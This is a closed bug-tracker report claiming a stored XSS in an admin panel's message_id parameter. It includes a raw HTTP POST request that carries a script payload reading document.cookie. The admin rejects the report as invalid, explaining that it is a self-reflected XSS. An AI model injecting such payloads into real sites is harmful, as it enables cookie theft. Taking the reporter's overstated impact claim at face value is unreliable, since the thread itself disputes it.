Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by waloodi_109 - 13.11.2024
Last edited by cbay - 13.11.2024

FS#99 - STORED XSS IN MESSAGE PARAMETER

Stored Xss in mesaage parameter:

Hello Team, I hope you are doing well. While Researching on your domain i Found Stored Xss in message Parameter via Post Method.

Steps:

1. Go to https://admin.alwaysdata.com/message/toggle/.
2. Capture this request on BurpSuite.
3. While in Post Request, there is message_id parameter, you can input xss payload <script>alert(document.cookie)</script> and copy the request and paste it in browser you see it will reflecting in browser.

Poc:

POST /message/toggle/ HTTP/2
Host: admin.alwaysdata.com
Cookie: csrftoken=xxxxxxxxxxxxxx; django_language=en; sessionid=xxxxxxxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://admin.alwaysdata.com/message/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrftoken: nxxtYwkQfIRMWcftaEokwghO10GoV6yv
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: https://admin.alwaysdata.com Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

message_id=<script>alert(document.cookie)</script>

Impact
Can steal Cookie, Can run javascript code, etc

Thank You,

Waleed Anwar

Closed by  cbay
13.11.2024 10:50
Reason for closing:  Invalid
Admin
cbay commented on 13.11.2024 10:47

Hello,

First, if you have to use a proxy to modify a parameter, then it's not exploitable.

Second, even in that case, that's a self-reflected XSS, which is harmless.

Kind regards,
Cyril

waloodi_109 commented on 13.11.2024 10:50

Maybe, any attacker host this and send it to the user to steal cookies.

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing